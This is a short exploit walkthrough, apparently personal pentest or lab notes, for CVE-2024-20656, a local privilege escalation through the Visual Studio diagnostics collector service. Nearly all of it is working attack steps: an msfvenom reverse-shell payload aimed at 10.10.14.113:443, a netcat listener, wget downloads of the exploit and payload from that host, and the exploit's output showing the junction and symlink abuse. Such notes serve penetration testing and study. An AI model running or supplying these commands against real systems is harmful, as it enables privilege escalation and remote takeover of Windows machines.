CVE-2024-20656 LPE

https://www.mdsec.co.uk/2024/01/cve-2024-20656-local-privilege-escalation-in-vsstandardcollectorservice150-service/

https://github.com/Wh04m1001/CVE-2024-20656

Exploit

⚠️ If you are using WinRM please consider moving to a logon session with RunasSC https://github.com/antonioCoco/RunasCs

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe
sudo cp payload.exe /var/www/html
sudo nc -nvlp 443 -s 10.10.14.113

PS C:\Windows\system32> mkdir c:\exploit
PS C:\Windows\system32> wget 10.10.14.113/Expl.exe -O c:\exploit\Expl.exe
PS C:\Windows\system32> wget 10.10.14.113/payload.exe -O c:\exploit\payload.exe
PS C:\Windows\system32> $VSDiagnostics = get-item "C:\\*\\Microsoft Visual Studio\\*\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe" | select -last 1
PS C:\Windows\system32> c:\exploit\Expl.exe $VSDiagnostics.FullName "c:\exploit\payload.exe"
[+] VSDiagnostics: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
[+] Payload: c:\exploit\payload.exe
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \??\C:\a11c80fd-8951-4add-b93c-6d312af3bd4a created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \RPC Control created!
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \??\C:\a11c80fd-8951-4add-b93c-6d312af3bd4a created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
PS C:\Windows\system32>